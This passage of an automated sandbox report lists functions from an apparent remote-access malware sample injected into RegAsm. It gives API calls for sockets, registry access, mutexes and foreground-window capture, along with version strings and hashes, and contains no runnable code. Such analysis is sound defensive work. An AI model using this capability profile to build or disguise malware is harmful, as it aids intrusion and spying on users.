                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: 5.1.3 Light
                                                                                              • API String ID: 1818849710-1145503539
                                                                                              • Opcode ID: 991656ebcf3dbdb5e087e2271452528c92513c84ec576b1201f88ea9e43e64e4
                                                                                              • Instruction ID: ebd1829d961e48a05cccc46ad5987234d1f606a9772c4a5001abe3e09c24b449
                                                                                              • Opcode Fuzzy Hash: 991656ebcf3dbdb5e087e2271452528c92513c84ec576b1201f88ea9e43e64e4
                                                                                              • Instruction Fuzzy Hash: 8FF0F632800108FBCB00AFA0DD05EEE776CEF04304F10417ABE09A6091D6359E08DA58
                                                                                              Function 0040CF8C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,time,?,?,0040931D,time), ref: 0040CFA3
                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040931D,time), ref: 0040CFB7
                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040931D,time), ref: 0040CFC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: time
                                                                                              • API String ID: 3677997916-1872009285
                                                                                              • Opcode ID: 401d4be426691079ecc9c4ee1270c2ab9911a3fb7cdc295d6fdecd50ed41ba30
                                                                                              • Instruction ID: 01e9e4454c5815cd9fe83fd72c8224fe9163c15e3a8ae46bcaeb397ef7d6e021
                                                                                              • Opcode Fuzzy Hash: 401d4be426691079ecc9c4ee1270c2ab9911a3fb7cdc295d6fdecd50ed41ba30
                                                                                              • Instruction Fuzzy Hash: FDE06D36901238FBDB204BA29D4DDEB7F6DDF477A4F010265BD08A2151D2354E10E6E5
                                                                                              Function 00401E12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(0040F689,00468140,00467C58,?,?,?,?,?,?,0040F689,?,00000001,0000004C,00000000), ref: 00401E49
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              • GetLocalTime.KERNEL32(0040F689,00468140,00467C58,?,?,?,?,?,?,0040F689,?,00000001,0000004C,00000000), ref: 00401EA1
                                                                                              Strings
                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 00401E3E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                              • API String ID: 481472006-1507639952
                                                                                              • Opcode ID: 358479353bd55bbf4045116b195f3fc638d59cad8268215c9071536c8c9b5d82
                                                                                              • Instruction ID: 1d52dbcb1ff0e0c2d988e19544ba4eb29f5678dad8abbd2e12691aec51a988aa
                                                                                              • Opcode Fuzzy Hash: 358479353bd55bbf4045116b195f3fc638d59cad8268215c9071536c8c9b5d82
                                                                                              • Instruction Fuzzy Hash: 9D21D171E0424067CB10B7BAED0A7EEBB245793345F14413EEC01272E2EEB85949C7AB
                                                                                              Function 0043B627 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0043B648
                                                                                                • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,?,6ZB,0000000F,?,0042A8FC,00000000,0000000F,004274BC,?,6ZB,00429466,?,?,00000000), ref: 0043B684
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap$_free
                                                                                              • String ID: 6ZB
                                                                                              • API String ID: 1482568997-119657810
                                                                                              • Opcode ID: f3172a60f651ac873e8c23c5784766f2a69c96e2c7a7c66e4e6bdf76f955f2f4
                                                                                              • Instruction ID: fe16a153650bf957c02c75a4bda108abfe66e8103c26be9158aaf2df18b8f7a5
                                                                                              • Opcode Fuzzy Hash: f3172a60f651ac873e8c23c5784766f2a69c96e2c7a7c66e4e6bdf76f955f2f4
                                                                                              • Instruction Fuzzy Hash: 81F0C83160060466DB212B26AC07F6B3758DFD9774F14612BFB14662A2EF2CD80185DF
                                                                                              Function 0043E2FB Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: db561e35d30af508af9f2af5912aba34c01efa7380076f61f9db343e10e7c5c8
                                                                                              • Instruction ID: f6d658ae2e7e1fcbb9d214fdc8f151dc648680e7b03e9b6c7994593d924eff1b
                                                                                              • Opcode Fuzzy Hash: db561e35d30af508af9f2af5912aba34c01efa7380076f61f9db343e10e7c5c8
                                                                                              • Instruction Fuzzy Hash: 6051C171E0121AABCB10DFA6C845EEF7BB4AF5D314F10205BF804A72D1D6789902CB69
                                                                                              Function 004018E7 Relevance: 4.6, APIs: 3, Instructions: 77synchronizationnetworkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,?,00000008,00000004,00000000,0000000C,00000000,?,?,00467C58), ref: 0040196B
                                                                                              • SetEvent.KERNEL32(?,?,00467C58,?,?,?,?,?,?,004049F5,000000B2), ref: 00401999
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EventObjectSingleWaitsend
                                                                                              • String ID:
                                                                                              • API String ID: 3963590051-0
                                                                                              • Opcode ID: 27af60bf33b0b41a9ccf68358aa7ff0c11537270062b2fdb526a3334bb4c6941
                                                                                              • Instruction ID: 45700d370154fa5f4d62816e2196c9d0dd2bc9e8c8792b5ef317c5eded93a812
                                                                                              • Opcode Fuzzy Hash: 27af60bf33b0b41a9ccf68358aa7ff0c11537270062b2fdb526a3334bb4c6941
                                                                                              • Instruction Fuzzy Hash: 92213071900305ABC706EBA1D9959EEB728EF14314B10813BF626771E1DF786D09C794
                                                                                              Function 0040D033 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,00000000), ref: 0040D057
                                                                                              • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 0040D074
                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 0040D07F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: ace8b4fc2de24946ab29f44ec40981b8a586b02f85e041542c5e1d0f27546c52
                                                                                              • Instruction ID: d1556b6a21c4095f6825b550070d3a1ea107f6ab0172e99dcae801f88fb81ba0
                                                                                              • Opcode Fuzzy Hash: ace8b4fc2de24946ab29f44ec40981b8a586b02f85e041542c5e1d0f27546c52
                                                                                              • Instruction Fuzzy Hash: A301A27A900128BBCB209B91DC48DEFBB7DDB85354F000166BB09B3140DA348E1A97A8
                                                                                              Function 0040D18B Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
                                                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 0040D1CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: fa00813bcb7015f133936317acef8d2907e127f5beb0b60e69fb4cf08a1841a2
                                                                                              • Instruction ID: cc6cebfca2548575ee20f86db8a71b62532355b0905f8b8d9a1577e7996aa7c0
                                                                                              • Opcode Fuzzy Hash: fa00813bcb7015f133936317acef8d2907e127f5beb0b60e69fb4cf08a1841a2
                                                                                              • Instruction Fuzzy Hash: C3016D3680412DBBCF21AFD1DC45DEB7F38EF06354F008165BE0866161DA35896AEBA4
                                                                                              Function 0040CFD6 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0040CFF6
                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00467F30), ref: 0040D014
                                                                                              • RegCloseKey.KERNEL32(?), ref: 0040D01F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 70b0dd12e2a5ac5965a0120e69f62f08b290a07ebd25e271949baf3e135a97bd
                                                                                              • Instruction ID: fb118fa7efbfe96847db450d91ab692ef4bc3c1656726d9dc2d007ede4cac492
                                                                                              • Opcode Fuzzy Hash: 70b0dd12e2a5ac5965a0120e69f62f08b290a07ebd25e271949baf3e135a97bd
                                                                                              • Instruction Fuzzy Hash: F2F01D76D00218BFDF109FE09C05FEE7BBCEB05714F1041A5FA08E6191D6355A159B94
                                                                                              Function 004019BA Relevance: 4.5, APIs: 3, Instructions: 33synchronizationnetworkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00401A75,00000000,?,?,?,?,00467C58), ref: 004019CD
                                                                                              • SetEvent.KERNEL32(?,?,00401A75,00000000,?,?,?,?,00467C58), ref: 004019E9
                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 004019FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EventObjectSingleWaitrecv
                                                                                              • String ID:
                                                                                              • API String ID: 311754179-0
                                                                                              • Opcode ID: 807941194d1bd6967e832f8b0e249fbb8b247f08d3eeb641c03f5fb9dbc0d9bd
                                                                                              • Instruction ID: d9466d9d8077d25d7f7cbd1c4f71f3b68f7ba3a0b9153bb1b975164caa6374b9
                                                                                              • Opcode Fuzzy Hash: 807941194d1bd6967e832f8b0e249fbb8b247f08d3eeb641c03f5fb9dbc0d9bd
                                                                                              • Instruction Fuzzy Hash: B5F0B43A104106BFDB054F51EC09E89BB66FB45331F10822AF914522B0DB72F820DB94
                                                                                              Function 0040D310 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,00459594), ref: 0040D31E
                                                                                              • RegSetValueExA.KERNEL32(00459594,000000AF,00000000,00000004,00000001,00000004,?,?,?,00408639,00459A08,00000001,000000AF,00459594), ref: 0040D339
                                                                                              • RegCloseKey.KERNEL32(00459594,?,?,?,00408639,00459A08,00000001,000000AF,00459594), ref: 0040D344
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID:
                                                                                              • API String ID: 1818849710-0
                                                                                              • Opcode ID: 83e19b0ee784d6d7dd655aae5b191897494fea023ec0ff9c5dc0952b7e1e2595
                                                                                              • Instruction ID: 70c1ac6059dc5b3d9a0709b10961866a60481b6b1b62c8df2f439cbbf28fa7e5
                                                                                              • Opcode Fuzzy Hash: 83e19b0ee784d6d7dd655aae5b191897494fea023ec0ff9c5dc0952b7e1e2595
                                                                                              • Instruction Fuzzy Hash: F7E06D76900208FBDF109FE09C06FEA7B6CEF05B54F104165BF08A7190D2359E18E7A9
                                                                                              Function 00413DA2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00413DB6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID: @
                                                                                              • API String ID: 1890195054-2766056989
                                                                                              • Opcode ID: e08c46f4b7c9224bddf151585ea8162b0d5b52e2a77b9615d3b8d20d9e061e64
                                                                                              • Instruction ID: d09a9182af43900144d88bc296ac47a2db28685262ff58751487d5f6ada68e36
                                                                                              • Opcode Fuzzy Hash: e08c46f4b7c9224bddf151585ea8162b0d5b52e2a77b9615d3b8d20d9e061e64
                                                                                              • Instruction Fuzzy Hash: 6ED017F58063189FC720DFA8E804A8DBBFCEB08214F00426AEC49E3300E774A8048B85
                                                                                              Function 0043DF16 Relevance: 3.1, APIs: 2, Instructions: 77fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0043E452,0044A1E5,00000000,00000000,00000000,00000000,00000000), ref: 0043DFB1
                                                                                              • GetLastError.KERNEL32(?,0043E452,0044A1E5,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043DFDA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastWrite
                                                                                              • String ID:
                                                                                              • API String ID: 442123175-0
                                                                                              • Opcode ID: 4e604de54c0c16fb63236437478171a74cf0674a11df861b20791f25d20fef9f
                                                                                              • Instruction ID: d0e8807f396b87dc88f27a537f7ef0481427f55a5841e76be524782304dbab6f
                                                                                              • Opcode Fuzzy Hash: 4e604de54c0c16fb63236437478171a74cf0674a11df861b20791f25d20fef9f
                                                                                              • Instruction Fuzzy Hash: 4221BF75A002199FCB24CF69D9C0BE9B3F9FB4C306F1044AAE54AD3251D774AE81CB28
                                                                                              Function 00401673 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • socket.WS2_32(?,00000001,00000006), ref: 00401698
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040603A,00000000,?,0041054D), ref: 004016D4
                                                                                                • Part of subcall function 004016E4: WSAStartup.WS2_32(00000202,00000000), ref: 004016F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateEventStartupsocket
                                                                                              • String ID:
                                                                                              • API String ID: 1953588214-0
                                                                                              • Opcode ID: 36e7bfa51ce044c78e083c68398fd1d69a647d25f0744323a0148b4db47791e7
                                                                                              • Instruction ID: ee37118afe77b65253b8e33a0694ca72e24623c2f1becaa2fb2072e3896651ba
                                                                                              • Opcode Fuzzy Hash: 36e7bfa51ce044c78e083c68398fd1d69a647d25f0744323a0148b4db47791e7
                                                                                              • Instruction Fuzzy Hash: CF017171404B809FD7358F79A8856867FE0AB16304F084E6EF4D693BA1D3B1A841CF19
                                                                                              Function 0041405D Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 0041407F
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00414092
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundText
                                                                                              • String ID:
                                                                                              • API String ID: 29597999-0
                                                                                              • Opcode ID: c5d1790482d31bb39bac7637a6c380ed8658cbbb0c4e4fcbb36a884a29da3412
                                                                                              • Instruction ID: ff7f5eef8d98a0492a210f45f8baf9828faad962107cd842769706ac33101dd5
                                                                                              • Opcode Fuzzy Hash: c5d1790482d31bb39bac7637a6c380ed8658cbbb0c4e4fcbb36a884a29da3412
                                                                                              • Instruction Fuzzy Hash: ADE04875F0032867EB20ABE5AC4FFD57B6CE705715F0005AAF918D3183E9B5990487E5
                                                                                              Function 004087EF Relevance: 3.0, APIs: 2, Instructions: 12synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040A324,Exe,00000000,0000000E,00000000,004595AC,00000003,00000000), ref: 004087FE
                                                                                              • GetLastError.KERNEL32 ref: 00408804
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateErrorLastMutex
                                                                                              • String ID:
                                                                                              • API String ID: 1925916568-0
                                                                                              • Opcode ID: ad70dbe040568da7a8bf80a41bb3d92e4cc7e949328fb993af6de4085ac2e67a
                                                                                              • Instruction ID: d80e09737745f7bf6ee3eddf50bc73956995b70806c11dd9ed117efe7a266b7c
                                                                                              • Opcode Fuzzy Hash: ad70dbe040568da7a8bf80a41bb3d92e4cc7e949328fb993af6de4085ac2e67a
                                                                                              • Instruction Fuzzy Hash: 26C08C787942005BE70923609D8EB2C2440EB48707F10807AF203D40D0CBD48840852A
                                                                                              Function 0043FD0E Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID:
                                                                                              • API String ID: 3347428461-0
                                                                                              • Opcode ID: a4c2d37a2ffb15a0b9390feb104e9e3189100b9696ae48cbff68aa1a90caf144
                                                                                              • Instruction ID: 50b4598867dae1bcce64cb2b1d6a8e4565d0ee6ceef77aa30aff86369a51d403
                                                                                              • Opcode Fuzzy Hash: a4c2d37a2ffb15a0b9390feb104e9e3189100b9696ae48cbff68aa1a90caf144
                                                                                              • Instruction Fuzzy Hash: C611487190410AAFCB05DF58E94499F7BF4EF48304F00406AF809AB311D634E915CB69
                                                                                              Function 0041ED95 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041EE6D: recv.WS2_32(?,?,?,?), ref: 0041EE78
                                                                                              • WSAGetLastError.WS2_32 ref: 0041EDB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastrecv
                                                                                              • String ID:
                                                                                              • API String ID: 2514157807-0
                                                                                              • Opcode ID: f2ed9efc29f8101d6ef1120ec222f35c5d439f01bd60f1326fd1fba732be379b
                                                                                              • Instruction ID: faf68b5ff96845e0976cbf32cc890fde9b2ffc12f7c1b339871521fb39d3c049
                                                                                              • Opcode Fuzzy Hash: f2ed9efc29f8101d6ef1120ec222f35c5d439f01bd60f1326fd1fba732be379b
                                                                                              • Instruction Fuzzy Hash: FCF0A43920C1165BDF18A55AFC948F933569B49334B30472BFD39825F0DA2998D11109
                                                                                              Function 0043AF95 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0043C6C9,00000001,00000364,?,004322D5,00000000,00000000,00000000,00000000,00000000,?,00467F30), ref: 0043AFD6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: ac73287723b5aced0c8671368978bbe2700735a34e1e8d5040177b1074273be0
                                                                                              • Instruction ID: a7c765c1dc6197512c48bfc0f123c91e67cad64699951c3927080ceb2c5ec14d
                                                                                              • Opcode Fuzzy Hash: ac73287723b5aced0c8671368978bbe2700735a34e1e8d5040177b1074273be0
                                                                                              • Instruction Fuzzy Hash: 26F0597168462467DF246B23CD01E5F7748AF497B0F246123F898A7280EB38DC2186AF
                                                                                              Function 0041EE06 Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041EE86: send.WS2_32(?,?,?,?), ref: 0041EE91
                                                                                              • WSAGetLastError.WS2_32 ref: 0041EE28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastsend
                                                                                              • String ID:
                                                                                              • API String ID: 1802528911-0
                                                                                              • Opcode ID: 56a01c97fea5148d169d396be95ef90d72e0cb9545c730587fd84c0222672ff3
                                                                                              • Instruction ID: 51c8cce08e66605cdbda4daed835d51d1109a6a45c2cb2692f3426c1110deaf5
                                                                                              • Opcode Fuzzy Hash: 56a01c97fea5148d169d396be95ef90d72e0cb9545c730587fd84c0222672ff3
                                                                                              • Instruction Fuzzy Hash: BEF0963E20C3169ADE28995BE8548BA33519F49330F30471BFE3A866F0DA2868D05549
                                                                                              Function 0044906E Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: dcea2d80a7c79e61e0e4943dd00b300466efce18bf725d1671facf715dd67e6f
                                                                                              • Instruction ID: 1a413651f4eac2a1d6789980bfe11d8de2d46469f41b36d66384da507bd676ba
                                                                                              • Opcode Fuzzy Hash: dcea2d80a7c79e61e0e4943dd00b300466efce18bf725d1671facf715dd67e6f
                                                                                              • Instruction Fuzzy Hash: 28F03A32510109BBDF119E9ADC02DDB3B6AEF89364F140156FA2492190DA3A8E21ABE5
                                                                                              Function 00421A47 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: 22699940921670cea81428bdabe59e4847727134e4e4e844efbb97aec173da56
                                                                                              • Instruction ID: 83cc0374e36e5747cfaf01cff9ff357897640656ddeb4857303a678d519aa75b
                                                                                              • Opcode Fuzzy Hash: 22699940921670cea81428bdabe59e4847727134e4e4e844efbb97aec173da56
                                                                                              • Instruction Fuzzy Hash: BEF05962701324BBD710D6B59A02BDBB7DC9F05304F40055AD958C3002E769F704CBA9
                                                                                              Function 0043B5D9 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 49cd7db547a6812ea919ba784c5821e6213d36d0b2f95fe5989dc103db6bbe40
                                                                                              • Instruction ID: 16c27336ec843f0918e80c63034b62d3bdb34504d24902ea495cf3875be00cfa
                                                                                              • Opcode Fuzzy Hash: 49cd7db547a6812ea919ba784c5821e6213d36d0b2f95fe5989dc103db6bbe40
                                                                                              • Instruction Fuzzy Hash: F2E0E531601A2057E62027628C0376B764CDF493B4F142027FE6597392DB29DC0185EF
                                                                                              Function 004016E4 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                              Download Yara Rule
